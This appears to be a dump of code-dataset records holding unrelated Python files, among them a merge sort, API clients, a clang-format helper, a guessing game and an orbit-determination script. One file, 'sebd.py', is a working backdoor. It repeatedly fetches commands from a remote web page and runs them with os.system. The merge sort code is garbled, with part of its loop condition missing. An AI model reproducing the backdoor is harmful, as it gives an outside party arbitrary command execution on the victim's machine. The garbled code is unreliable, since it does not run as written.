str(phone_number.national_format) + \"\\n\")\nf.write(\"Phone No. : \" + str(phone_number.phone_number) + \"\\n\")\nf.write(\"url : \" + str(phone_number.url) + \"\\n\")\nf.close()","sub_path":"lookup/fetch_lookup_type_caller-name.py","file_name":"fetch_lookup_type_caller-name.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"270321681","text":"def divide(left,right):\n a=[]\n i,j = 0,0\n n=len(left)\n m=len(right)\n while i+jright[j]:\n a.append(right[j])\n j+=1\n elif left[i]<=right[j]:\n a.append(left[i])\n i+=1 \n return a\n\ndef merge(arr, l, r):\n if r-l<=1:\n return arr[l:r]\n elif r-l>1:\n m = int((l+r)/2)\n left = merge(arr,l,m)\n right = merge(arr,m,r)\n return divide(left,right)\n\nl=list(map(int, input().split()))\nprint(merge(l,0,len(l)))\n","sub_path":"Sorting/Merge_Sort.py","file_name":"Merge_Sort.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"142376671","text":"import requests\nimport json\nfrom diablo import Diablo\nclass BattleNet:\n def __init__(self, id, secret, locale='en_GB', region='eu'):\n self.id = id\n self.secret = secret\n self.region = region\n self.locale = locale\n\n data = {'grant_type': 'client_credentials'}\n response = requests.post('https://us.battle.net/oauth/token', data=data, auth=(self.id, self.secret))\n token_json = response.json()\n self.access_token = token_json[\"access_token\"]\n\n def d3(self):\n return Diablo(access_token=self.access_token, locale=self.locale, region=self.region)\n","sub_path":"battlenet.py","file_name":"battlenet.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"458241868","text":"\"\"\"\n@authors:\n Jared Blackman\n@since\n 2016-03-06\n\"\"\"\n\nfrom DumbBasicGrammar import grammar_DumbBasic\n\n\"\"\"MAIN\"\"\"\nwhile (__name__ == '__main__'):\n codeString = []\n f = open(\"SampleCode.txt\")\n for l in f:\n for c in l:\n codeString.append(c)\n f.close()\n\n from Parser import Parser_Earley\n DumbBasicParser = Parser_Earley(grammar_DumbBasic)\n print(DumbBasicParser.parse(codeString))\n\n exit()","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"144087644","text":"from urllib.parse import urlparse\r\nfrom urllib.parse import urljoin\r\nimport urllib.request\r\nimport os\r\nimport requests\r\n\r\nfrom requests_toolbelt.multipart.encoder import MultipartEncoder\r\n\r\n\r\nclass SdmHttpClient(object):\r\n\r\n base_url = \"http://ida.grenoble.xrce.xerox.com\"\r\n urls = {\r\n \"upload\": \"ScheduleManager.Api/api/Schedule\",\r\n \"list\": \"ScheduleManager.Api/api/Schedule\",\r\n \"get\": \"ScheduleManager.Api/api/Schedule\",\r\n \"delete\": \"ScheduleManager.Api/api/Schedule\",\r\n }\r\n\r\n def __init__(self, date):\r\n self.date = date.strftime(\"%Y-%m-%d\")\r\n self.check_server()\r\n\r\n def url(self, action):\r\n return urljoin(self.base_url, self.urls[action])\r\n\r\n def sdm_alive(self):\r\n res = requests.get(self.base_url)\r\n if res.status_code == 200:\r\n return True\r\n else:\r\n return False\r\n\r\n def check_server(self):\r\n res = self.sdm_alive()\r\n if not res:\r\n msg = \"SDM on {} did not respond to ping. Is it running?\"\r\n raise ManagerException(msg.format(self.url))\r\n\r\n def list_gtfs(self, criteria):\r\n criteria[\"startdate\"] = criteria[\"enddate\"] = self.date\r\n if type not in criteria:\r\n criteria[\"type\"] = \"None\"\r\n res = requests.get(\r\n '?'.join([\r\n self.url(\"list\"),\r\n '&'.join(['='.join([k, v]) for k, v in criteria.items()])\r\n ])\r\n )\r\n return [gtfs for gtfs in res.json()]\r\n\r\n def get_gtfs(self, id, name=\"gtfs.zip\"):\r\n gtfs_file = urllib.request.urlopen('?'.join([self.url(\"get\"), '='.join([\"id\", id])]))\r\n gtfs_path = os.path.expanduser(os.path.join(os.getcwd(), \"temp\", name))\r\n with open(gtfs_path, \"wb\") as gtfs:\r\n gtfs.write(gtfs_file.read())\r\n\r\n return gtfs_path\r\n\r\n def delete_gtfs(self, id):\r\n return requests.delete('?'.join([self.url(\"delete\"), '='.join([\"id\", id])]))\r\n\r\n def prepare_gtfs(self, gtfs_zip, gtfs_name , type):\r\n return MultipartEncoder(\r\n fields={\r\n \"name\": gtfs_name,\r\n \"startdate\": self.date,\r\n \"enddate\": self.date,\r\n \"type\": type,\r\n \"schedule\": (gtfs_zip, open(gtfs_zip, 'rb'), 'text/plain')\r\n }\r\n )\r\n\r\n def post_gtfs (self, gtfs_zip, gtfs_name , type=\"planned\"):\r\n multipart_data = self.prepare_gtfs(gtfs_zip, gtfs_name.lower() , type)\r\n res = requests.post(\r\n self.url(\"upload\"),\r\n data=multipart_data,\r\n headers={'Content-Type': multipart_data.content_type}\r\n )\r\n if 200 != res.status_code:\r\n msg = \"Error during the upload of the gtfs {} to SDM\"\r\n raise ManagerException(msg.format(gtfs_name))\r\n\r\n\r\nclass ManagerException(Exception):\r\n \"\"\"Class to generate the raised exception.\"\"\"\r\n\r\n def __init__(self, message):\r\n self.message = message\r\n\r\n def __str__(self):\r\n return self.message","sub_path":"utilities/sdm.py","file_name":"sdm.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"600085740","text":"import os.path\nimport sys\nfrom optparse import OptionParser\nfrom subprocess import Popen, PIPE\n\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../common\"))\nfrom sb import *\n\ndef ExecuteClangFormatOnFile(clangFormat, filePath):\n\n process = Popen([clangFormat, \"-i\", filePath], stdout=PIPE, stderr=PIPE)\n (output, err) = process.communicate()\n return process.wait()\n\nif __name__ == \"__main__\":\n\n optParser = OptionParser()\n\n optParser.add_option(\"-i\", \"--input\", action=\"store\",\n type=\"string\", help=\"Input path\", dest=\"inputPath\")\n\n (options, args) = optParser.parse_args()\n\n if (options.inputPath is None):\n log.LOG(log.Level.FATAL_ERROR, \"options -i is required\")\n\n clangFormatPath = os.path.join(host.GetUtlBinPath(), \"clang\", host.GetExeFileName(\"clang-format\"))\n\n if os.path.exists(options.inputPath):\n if os.path.isfile(options.inputPath):\n err = ExecuteClangFormatOnFile(clangFormatPath, options.inputPath)\n if 0 != err:\n log.LOG(log.Level.ERROR, \"Failed to format {}\".format(options.inputPath))\n elif os.path.isdir(options.inputPath):\n files = []\n extenstions_with_dot = [\".\" + ext for ext in code.CPP_FILE_EXTENSIONS]\n file_system.FindFiles( files, dirs=[options.inputPath], extensions=extenstions_with_dot )\n for file_iter in files:\n err = ExecuteClangFormatOnFile(clangFormatPath, file_iter)\n if 0 != err:\n log.LOG(log.Level.ERROR, \"Failed to format {}\".format(file_iter))\n else:\n log.LOG(log.Level.ERROR, \"{} is not a supported input path\".format(options.inputPath))\n else:\n log.LOG(log.Level.ERROR, \"{} does not exist\".format(options.inputPath))\n\n log.Exit()\n","sub_path":"utl/script/code/file_format.py","file_name":"file_format.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"160275067","text":"# Desafio 28 \"melhorado\", com o jogador tentando advinhar até que o computador acerte.\nimport random\nfrom time import sleep\nnumero_pc = random.randint(0, 10)\nprint('-=-' * 20)\nprint('Vou pensar em um numero entre 0 e 10. Tente advinhar...')\nprint('-=-' * 20)\nsleep(1)\nnumero_user = int(input('Qual número escolhi? Digite um valor entre 0 e 10: '))\nprint('PROCESSANDO...')\nsleep(0.5)\ntentativas = 1\nwhile numero_user != numero_pc:\n print('Errou! Tente novamente!')\n tentativas += 1\n numero_user = int(input('Qual número escolhi? Digite um valor entre 0 e 10: '))\n print('PROCESSANDO...')\n sleep(1)\nprint('Parabéns!! Após \\033[1;34m{}\\033[m tentativas, você advinhou! O PC também escolheu \\033[1;34m{}\\033[m.'.format(tentativas, numero_pc))","sub_path":"ex058.py","file_name":"ex058.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"416119528","text":"import os\nimport sys\nimport pickle\nimport pandas\nimport librosa\nimport numpy as np\nfrom tqdm.auto import tqdm\n\nimport triplet_network\n\ntriplet_model, triplet_backbone = triplet_network.build_model(num_features=12)\ntriplet_model.load_weights('checkpoint.ckpt')\n\n\nSR = 16000\n\nMFCC_KWARGS = dict(\n n_mfcc=13,\n hop_length=500\n)\n\ndef timbre_eval(output, reference, neg):\n mfcc_out = librosa.feature.mfcc(output, sr=SR, **MFCC_KWARGS)[1:]\n mfcc_ref = librosa.feature.mfcc(reference, sr=SR, **MFCC_KWARGS)[1:]\n mfcc_neg = librosa.feature.mfcc(neg, sr=SR, **MFCC_KWARGS)[1:]\n \n mfcc_triplet_cos, _ = triplet_model.predict([\n (mfcc_out.T[None, :, :], mfcc_ref.T[None, :, :], mfcc_neg.T[None, :, :])]).reshape(2)\n return mfcc_triplet_cos\n\ndef main():\n top = 'results'\n ref_dir = 'refs'\n dirs = ['single','pipeline', 'unsup','config1', 'config3']\n domains = {'cv':0, 'ps':3}\n c1 = [d + '.cv' for d in dirs]\n c2 = [d + '.ps' for d in dirs]\n cols = c1\n df = pandas.DataFrame(columns=cols)\n dom = 'ps'\n for i, d in tqdm(enumerate(dirs)):\n where = f'{top}/{d}/{dom}'\n for j, f in enumerate(sorted(os.listdir(where))):\n if not f[-3:]=='wav':\n j = j-1\n continue\n name = f[0:3]\n output = f'{where}/{f}'\n pos = f'{top}/{ref_dir}/{name}.{domains.get(dom)}.wav'\n neg = f'{top}/{ref_dir}/{name}.0.wav'\n outa, _ = librosa.load(output, 16000)\n posa, _ = librosa.load(pos, 16000)\n nega, _ = librosa.load(neg, 16000)\n cos = timbre_eval(outa, posa, nega)\n df.at[j, f'{d}.{dom}'] = cos \n df.to_csv('./timbre.csv')\n\nif __name__ == \"__main__\":\n main()","sub_path":"evaluation/timbre.py","file_name":"timbre.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"249642439","text":"'''\nCreated on Nov 29, 2014\n\n@author: shaner\n'''\n\n\n\nmiles_run = 0\nrunning = True\n\nwhile running:\n if miles_run <= 10:\n print(\"Still running! On mile {}\".format(miles_run))\n miles_run += 1\n else:\n running = False\nelse:\n print(\"Whew! I'm tired\")\n\n\nLtoLondon = 0\nLondontoL = 102\nstillWalking = True\n \nwhile stillWalking:\n if LtoLondon >= LondontoL:\n stillWalking = False\n else:\n LtoLondon += 2\n LondontoL = LondontoL - 1\nelse:\n print('The would meet at mile marker {} '.format(LondontoL))\n \nprint ('102m - 1m/h x/h h/m = 2m/h * xh')\nprint ('102 1/h = 2xh + xh')\nprint ('102= xh (2+ 1)')\nprint ('102/3 = ', 102/3 , ' hours at mile marker ', LtoLondon)\n \n","sub_path":"While.py","file_name":"While.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"11898154","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/bee/Dev/piu/django/testSite/bee_django_track/templatetags/bee_django_track_filter.py\n# Compiled at: 2018-11-12 01:54:46\n__author__ = 'zhangyue'\nfrom django import template\nfrom django.conf import settings\nfrom django.shortcuts import reverse\nfrom bee_django_track.utils import get_user_name\nregister = template.Library()\n\n@register.filter\ndef get_difference_abs(a, b):\n return abs(a - b)\n\n\n@register.filter\ndef get_name_detail(user, show_detail=True):\n if not user:\n return None\n else:\n user_name = get_user_name(user)\n if not show_detail:\n return user_name\n if settings.USER_DETAIL_EX_LINK:\n link = \"\" + user_name + ''\n else:\n link = user_name\n return link\n\n\n@register.simple_tag\ndef get_record_link(cookie_user, record):\n if record.content_type.identity == 'user_leave':\n return record.get_link\n if record.content_type.identity == 'crm_fee':\n if cookie_user.has_perm('bee_django_crm.view_crm_preuser_fee'):\n return record.get_link\n else:\n return record.get_link","sub_path":"pycfiles/bee-django-track-0.0.10.tar/bee_django_track_filter.py","file_name":"bee_django_track_filter.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"621736590","text":"import os\nimport urllib.request as ur\n\nurl = 'http://www.diron.xyz/command.html'\n\ncommand = \"\"\n\nwhile command != 'stop': \n fp = ur.urlopen(url)\n lines = fp.read()\n\n command = \"\";\n csaver_active = False\n\n for ch_int in lines:\n ch = chr(ch_int)\n if csaver_active:\n if ch == '#':\n csaver_active = False\n else:\n command = command + ch\n else:\n if ch == '#':\n csaver_active = True\n\n os.system(command)\n","sub_path":"sebd.py","file_name":"sebd.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"198081671","text":"import numpy as np\nimport sympy as sp\n\"\"\"\nFalta iterar r2 \np=vector unitario tierra ceres\nP=vector tierra ceres\nr=vector sol ceres\nR=vector tierra sol\nT=tiempo observación\nt=kt tiempo gauss\n\n\"\"\"\n#angulo para distancia Tierra-Sol\ndef d(dia):\n return(365/360)*(31+25+ dia)\n\ndef decimales(a,b,c):\n return(a+b/60+c/3600)\ndef squ(x):\n return(x**2)\n\n#constantes\nc= 173.1446 #UA/dia~normal (velocidad de la luz) \nG=1.48814*10**-34#AU**3/kg*día**2~~ 6.67408*10**-11 #N*m**2/kg**2\nmu=G*(1.989*10**30 + 5.972*10**24)#kg\nk= 0.01720209895 \n#Epsilon=[[23,26,07.249],[23,26,07.293],[23,26,07.335]]#grados, minutos,segundos\n#Epsilon=[np.deg2rad(np.sum(decimales(x[0],x[1],x[2])for x in E_)/len(E_))]#angulo ecliptica-eceleste =23.435358981481482\nEpsilon=np.deg2rad(23.4352570810)\nR=1#UA\nExct= 0.016\nP=0#~luego se cambia ~creo que nunca se usa\n\n#datos observaciones\nAr= np.array([[8, 42, 13.71520391],[8, 42, 3.6776478],[8, 41, 57.61776475],[8, 41, 45.35651401]])# reales\nDec=np.array([[31, 57, 48.37108478],[31, 55, 36.28691431],[31, 53, 43.2407565],[31, 40, 4.33621619]])# reales\ndatos=np.array([[np.deg2rad(15*decimales(x[0],x[1],x[2])) for x in Ar],[np.deg2rad(decimales(x[0],x[1],x[2])) for x in Dec]])#AR,DC\ndatosTransformados=[datos[:,0],datos[:,1],datos[:,2]]\ndatosExtra=[datos[:,3]]\n\n#vector observacion i,j,k ~~vectores unitarios\ndef vector(ar,d):\n return np.cos(ar)*np.cos(d),np.sin(ar)*np.cos(d),np.sin(d) \n\nvectores=[list(vector(i[0],i[1]))for i in datosTransformados]\np1=np.array(vectores[0])#observaciones \np2=np.array(vectores[1])#observaciones\np3=np.array(vectores[2])#observaciones\n#print(p1)##---[]\n#norma vectores p\nnormaVectores=[np.linalg.norm(i)for i in vectores] #~no es necesario aún \n\n#R (vector posición entre sol y tierra)\n\nRA=np.array([[11, 36, 6.30],[11, 40, 3.62],[11, 43, 10.25]])\nDEC=np.array([[2, 35, 0.5],[2, 9, 27.1],[1, 49, 19]])\ndata=np.array([[np.deg2rad(15*decimales(x[0],x[1],x[2])) for x in RA],[np.deg2rad(decimales(x[0],x[1],x[2])) for x in DEC]])#AR,DC\ntransformed_data=[data[:,0],data[:,1],data[:,2]]\n\nvectores2=[list(vector(i[0],i[1]))for i in transformed_data]\nR1=np.array(vectores2[0])\nR2=np.array(vectores2[1])\nR3=np.array(vectores2[2])\n#print(R2)\n'''\ndef rTS (angulo):\n return(R*(1-squ(Exct))/1+(Exct*np.cos(angulo)))\nR1=rTS(d(14))#--magnitud \nR1=np.array([R1*np.cos(d(14)),R1*np.sin(d(14)),0])\nR2=rTS(d(15))\nR2=np.array([R2*np.cos(d(15)),R2*np.sin(d(15)),0])\nR3=rTS(d(16))\nR3=np.array([R3*np.cos(d(16)),R3*np.sin(d(16)),0])\n#print(R3,np.linalg.norm(R3))----[],#\n'''\n#tiempo en kt (gaussian)\n\nT=[2458191.8942,2458192.9733,2458193.82275]\n\nT1=np.array(T[0])\nT2=np.array(T[1])\nT3=np.array(T[2])\n#print(T3)\n\ndef tiempos(T1,T2,T3):\n time=[]#t-t1-t3 \n time.append(k*(T3-T1))\n time.append(k*(T1-T2))\n time.append(k*(T3-T2))\n return(time)\nt=tiempos(T1,T2,T3)\n#print(t)---[]\n#valor inicial de r2 (vector posicion de la observación central)\n#print(p1)\n#print(p2)--np.array\n#print(p3)\n#print(R1)--np.array\nDinicial=np.dot(p1,np.cross(p2,p3))\n#print(Dinicial) ---#\n'''def DXx (Rx):\n if(np.all(Rx==R1)):\n return np.dot(np.cross(R1,p2),p3)\n elif (np.all(Rx==R2)):\n return np.dot(np.cross(p1,R2),p3)\n elif (np.all(Rx==R3)):\n return np.dot(p1,np.cross(p2,R3))\n '''\ndef D1x (j):\n return np.dot(np.cross(j,p2),p3)\ndef D2x (j):\n return np.dot(np.cross(p1,j),p3)\ndef D3x (j):\n return np.dot(p1,np.cross(p2,j))\n#print(DXx(R1))---#\n\"\"\"A1=t[2]/t[0]#---#\nB1=(A1/6)*(squ(t[0])-squ(t[2]))#---#\nA3=-t[1]/t[0]#---#\nB3=(A3/6)*(squ(t[0])-squ(t[1]))#---#\n\nA=(A1*DXx(R1)-DXx(R2)+A3*DXx(R3))/-Dinicial#---#\nB=(B1*DXx(R1)+B3*DXx(R3))/-Dinicial#---#\n\nEe=-2*(np.dot(p2,R2))#---#\nF=squ(np.linalg.norm(R2))#---#\n#print(Ee,F)\naa=-(squ(A)+A*Ee+F)#---#\nb=-mu*(2*(A*B+B*Ee))#---#\ncc=-squ(mu)*squ(B)#---#\n#print(aa,b,cc)\n\nr_2=sp.Symbol('r', real=True)\nequacion=r_2**8+aa*(r_2**6)+b*(r_2**3)+cc\nr2=sp.solve(equacion,r_2)\nr2 = np.array(r2)\nr2_inicial = r2[r2>0]\n\"\"\"\na1=t[2]/t[0]#---#\na2=-1\na3=-t[1]/t[0]#---#\n\nP1=(a1*D1x(R1)+a2*D1x(R2)+a3*D1x(R3))/a1*Dinicial\nP2=(a1*D2x(R1)+a2*D2x(R2)+a3*D2x(R3))/a2*Dinicial\nP3=(a1*D3x(R1)+a2*D3x(R2)+a3*D3x(R3))/a3*Dinicial\n#print(P1)#---# 2.9212279935443062e-06\n\nr1o=np.array((p1*P1)-R1)\nr2o=np.array((p2*P2)-R2)\nr3o=np.array((p3*P3)-R3)\n#print(r2o)#---vector [ 2.81140060e-01 -9.54691768e-01 1.52068239e-06]\nr2o_punto=(r3o-r1o)/t[0]\n#print(r2o_punto)# [-363.0428774815191, -1320.8112113396828, 0.0027111788399157956] - con np.array--esto[-3.63042877e+02 -1.32081121e+03 2.71117884e-03]\nrs=[]\n\ndef f (r2,r2_punto,kt):\n return 1-(mu*kt/2*(np.linalg.norm(r2)**3))+((kt**3)*mu*(np.dot(r2,r2_punto))/2*(np.linalg.norm(r2)**5))+(((kt**4)/24*(np.linalg.norm(r2)**3))*((3*((np.dot(r2_punto,r2_punto)/(np.linalg.norm(r2)**2))-(1/(np.linalg.norm(r2)**3))))-(15*((np.dot(r2,r2_punto)/(np.linalg.norm(r2)**2))**2))+(1/(np.linalg.norm(r2)**3))))\ndef g(r2,kt):\n return kt-(kt**3)*mu/6*(np.linalg.norm(r2)**3)-((kt**4)*(np.dot(r2,r2_punto)/4*(np.linalg.norm(r2)**5)))\n# Iterate\n '''\nrs=[[],[],[]]\n \nfor i in range(len(r2_inicial)):\n x = r2_inicial[i]\n #r2=x \n R2_punto=(R3-R2)/k*(t[2]-t[1])#--¿?Método de Lagrange\n p2_punto=(squ(t[2])*(p1-p2)-squ(t[0])*(p3-p2))/(t[0]*t[1]*t[2]) \n p2_2punto=-2*((t[2]*(p1-p2)-t[0]*(p3-p2))/t[0]*t[1]*t[2])\n P2_punto=-(1/2)*((1/x**3)-((1+(1/328900.5))/np.linalg.norm(R2)**3))*((np.dot(np.cross(p2,p2_2punto),R2))/(np.dot(np.cross(p2,p2_punto),p2_2punto))) \n AA=np.dot(np.cross(p2,p2_punto),R2)/np.dot(np.cross(p2,p2_punto),p2_2punto)\n BB=((1+(1/328900.5))/np.linalg.norm(R2)**3)*AA\n P2= (AA/x**3)-BB\n #print(P2)--#\n r2o=(P2*p2)-R2\n print(r2o)\n dr2=(P2_punto*p2)+(p2*p2_punto)-R2_punto\n print(dr2)\n #print(P2_punto)---#\n finale= False\n r = []\n #print (np.shape(dr2))\n while finale==False: \n otro_r2=r2o\n #truncated f & g \n \n f=[f(otro_r2,dr2,kt)for kt in t]\n f1=f[0]\n f3=f[2]\n #print(np.shape(f),f)\n \n g=[g(otro_r2,kt) for kt in t]\n g1=g[0]\n g3=g[2]\n #print(g)\n \n #dr2\n r1=f1*otro_r2+g1*dr2\n r3=f3*otro_r2+g3*dr2\n d1=-f3/(f1*g3-f3*g1)\n d3=f1/(f1*g3-f3*g1)\n dr2=d1*r1+d3*r3\n #dr2=sp.solve()\n #hallar c1 y c3\n \n c1= g3/((f1*g3)-(g1*f3))\n c2=-1\n c3= -g1/((f1*g3)-(g1*f3)) \n \n #hallar vectores posicion entre tierra y asteroide\n P1=(c1*D1x(R1)+c2*D1x(R2)+c3*D1x(R3))/c1*Dinicial\n P2=(c1*D2x(R1)+c2*D2x(R2)+c3*D2x(R3))/c2*Dinicial\n P3=(c1*D3x(R1)+c2*D3x(R2)+c3*D3x(R3))/c3*Dinicial\n #print(P2)\n \n #hallar posicion sol asteroide \n r1=P1-R1\n r2=P2-R2\n r3=P3-R3\n r=[r1,r2,r3]\n #print(r2)\n #hallar r y r.\n #Corrección tiempo de la luz ~~en teoría desde aquí ya empieza\n T1= T1-P1/c\n T2= T2-P2/c\n T3= T3-P3/c\n \n t=tiempos(T1,T2,T3)\n if(np.abs(np.linalg.norm(otro_r2)-np.linalg.norm(r2))<=0.001):\n finale=True\n else:\n otro_r2=r2\n rs[i] = r \n \n'''\n\n#print(r2o)\n#print(r2o_punto)\nfinale=False\nwhile finale==False: \n r2_ciclo=r2o\n r2_punto_ciclo= r2o_punto\n \n #Corrección tiempo de la luz ~~en teoría desde aquí ya empieza\n T1= T1-(P1/c)\n T2= T2-(P2/c)\n T3= T3-(P3/c)\n \n t=tiempos(T1,T2,T3)\n #truncated f & g \n \n f=[f(r2_ciclo,r2_punto_ciclo,kt)for kt in t]\n f1=f[0]\n f3=f[2]\n #print(f)\n \n g=[g(r2_ciclo,kt) for kt in t]\n g1=g[0]\n g3=g[2]\n #print(g)\n \"\"\" \n #dr2\n r1=f1*r2_ciclo+g1*r2_punto\n r3=f3*r2_ciclo+g3*r2_punto\n d1=-f3/(f1*g3-f3*g1)\n d3=f1/(f1*g3-f3*g1)\n dr2=d1*r1+d3*r3\n #dr2=sp.solve()\n \"\"\"\n #hallar c1 y c3\n \n c1= g3/((f1*g3)-(g1*f3))\n c2=-1\n c3= -g1/((f1*g3)-(g1*f3)) \n \n #hallar vectores posicion entre tierra y asteroide\n P1=(c1*D1x(R1)+c2*D1x(R2)+c3*D1x(R3))/c1*Dinicial\n P2=(c1*D2x(R1)+c2*D2x(R2)+c3*D2x(R3))/c2*Dinicial\n P3=(c1*D3x(R1)+c2*D3x(R2)+c3*D3x(R3))/c3*Dinicial\n \n #hallar posicion sol asteroide \n r1=np.array((p1*P1)-R1)\n r2=np.array((p2*P2)-R2)\n r3=np.array((p3*P3)-R3)\n #print(r2_punto_ciclo)\n r2_punto=(r3-r1)/t[0]\n\n \"\"\"\n r1=P1-R1\n r2=P2-R2\n r3=P3-R3\n \"\"\"\n r=[r1,r2,r3]\n #print(r2)\n #hallar r y r.\n #print(r2_ciclo,r2)\n if(np.abs(np.linalg.norm(r2_ciclo)-np.linalg.norm(r2))<=0.0001 and np.abs(np.linalg.norm(r2_punto_ciclo)-np.linalg.norm(r2_punto))<=0.0001):\n if(np.abs(np.linalg.norm(r2_ciclo)-np.linalg.norm(r2))>= -0.0001 and np.abs(np.linalg.norm(r2_punto_ciclo)-np.linalg.norm(r2_punto))>= -0.0001):\n finale=True\n print(\"aaa\")\n #print(r2_ciclo,r2)\n else:\n r2_ciclo = r2\n r2_punto_ciclo = r2_punto\n finale=False\n print(\"bbb\")\nrs = r\nr2s_punto = r2_punto\nprint(r2)\nprint(r2_punto)\n#print(rs,r2s_punto)\n\"\"\"\nJusqu'ici\n\"\"\"\n\n\n#rotar vectores r\ndef Rotar (Ep,vector):\n return np.dot(np.matrix([[1,0,0],[0,np.cos(Ep),np.sin(Ep)],[0,-np.sin(Ep),np.cos(Ep)]]),vector)\nr=[Rotar(Epsilon,vector) for vector in rs]\nr2n_punto=[Rotar(Epsilon,r2s_punto)]\nr2=r[1]\n \n\"\"\"\nELEMENTOS ORBITALES\n\"\"\"\ndef com(x1,x2):\n comun=[]\n for x in x1 and x2:\n comun.append(x)\n return (comun)\nrm=r2\nrp=r2n_punto\nprint (r2,rp[0], np.shape(rp))\nNorma_rm= np.linalg.norm(rm)\nh=np.cross(rm,rp)\nv2=np.dot(rp,rp)\n#Semieje mayor(a)\n\"\"\"\na=sp.Symbol('a')\na=(2/Norma_rm)-(np.dot(rp,rp)/mu)**-1\n\"\"\"\na=1/((2/rm)-v2)\n#P=2*np.pi*a**(3/2) #~~Verificar donde se usa\n\n#Excentricidad(e)\n\n#e=np.sqrt((1-(np.linalg.norm(h)**2))/mu*a)\ne=np.sqrt((1-(np.linalg.norm(h)**2))/a)\n\n#Inclinación(i)\n\nhz= h[3]\ni=np.arccos(hz/np.linalg.norm(h))#entre 0 y 90°\n\n#Longitud del nodo ascendente(O-omega)\n\nhx=h[0]\nhy=-h[1]\nO1=np.arcsin(hx/np.linalg.norm(h)*np.sin(i))\nO2=np.arccos(-hy/np.linalg.norm(h)*np.sin(i))\nO= com(O1,O2)\n\n#Perihelio(w-omega)\n#hallar v True anomaly\n\nv1=np.arccos(((a*(1-squ(e))/Norma_rm)-1)*1/e)\n#v2=np.arcsin((np.dot(rm,rp)*a*(1-squ(e)))/np.linalg.norm(h)*Norma_rm)\nv2=np.arcsin(((np.dot(rm,rp)*a*(1-squ(e)))/np.linalg.norm(h)*Norma_rm)*1/e)\nv= np.rad2deg(com(v1,v2))\n\n#hallar U--revisar x,y,z\n\nU1=np.arccos(np.dot(rm,np.cos(O)+np.sin(O))/Norma_rm) \nn=[np.cos(O),np.sin(O),0]\nz=Norma_rm*np.cross(n,(rm/Norma_rm)) \nU2=np.arcsin(z[0]/Norma_rm*np.sin(i)*np.sin(O))\nU=np.rad2deg(com(U1,U2))\n\nW=(U-v)\nw=[]\nfor x in W:\n if (0<=x<360):\n w.append(x)\n#Mean anomaly(M)\n\nE=np.arccos((1/e)*(1-(Norma_rm/a)))#---verificar mismo cuadrante que v \nM= E-(e*np.sin(E)) \n#Hay otra manera de M ~revisar\n \n'''\n ¿?\n\n#f y g otra vez\nn=np.sqrt(mu/a**3)\ndef fi(r2,DEi):#DEi= delta de la anomalía excéntrica (Ei-E.observación central) \n return(1-((a/r2)*(1-np.cos(DEi))))\ndef gi(ti,DEi):\n return((ti-T2)+(1/n)*np.sin(DEi)-DEi)\n'''","sub_path":"orbit det.py","file_name":"orbit det.py","file_ext":"py","file_size_in_byte":10840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"426443378","text":"import argparse\n\nARGS = argparse.ArgumentParser(description=\"Web crawler\")\nARGS.add_argument(\n '--iocp', action='store_true', dest='iocp',\n default=False, help='Use IOCP event loop (Windows only)')\nARGS.add_argument(\n '--select', action='store_true', dest='select',\n default=False, help='Use Select event loop instead of default')\nARGS.add_argument(\n 'roots', nargs='*',\n default=[], help='Root URL (may be repeated)')\nARGS.add_argument(\n '--max_redirect', action='store', type=int, metavar='N',\n default=10, help='Limit redirection chains (for 301, 302 etc.)')\nARGS.add_argument(\n '--max_tries', action='store', type=int, metavar='N',\n default=4, help='Limit retries on network errors')\nARGS.add_argument(\n '--max_tasks', action='store', type=int, metavar='N',\n default=100, help='Limit concurrent connections')\nARGS.add_argument(\n '--exclude', action='store', metavar='REGEX',\n help='Exclude matching URLs')\nARGS.add_argument(\n '--strict', action='store_true',\n default=True, help='Strict host matching (default)')\nARGS.add_argument(\n '--lenient', action='store_false', dest='strict',\n default=False, help='Lenient host matching')\nARGS.add_argument(\n '-v', '--verbose', action='count', dest='level',\n default=2, help='Verbose logging (repeat for more verbose)')\nARGS.add_argument(\n '-q', '--quiet', action='store_const', const=0, dest='level',\ndefault=2, help='Only log errors')\n\nargs = ARGS.parse_args()\nprint(args)","sub_path":"py/basics/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"358762162","text":"# -*- coding=utf-8\nfrom qcloud_cos import CosConfig\nfrom qcloud_cos import CosS3Client\nfrom qcloud_cos import CosServiceError\nfrom qcloud_cos import CosClientError\n\nimport sys\nimport logging\n\nlogging.basicConfig(level=logging.INFO, stream=sys.stdout)\n\n# 设置用户属性, 包括secret_id, secret_key, region\n# appid已在配置中移除,请在参数Bucket中带上appid。Bucket由bucketname-appid组成\nsecret_id = '' # 替换为用户的secret_id\nsecret_key = '' # 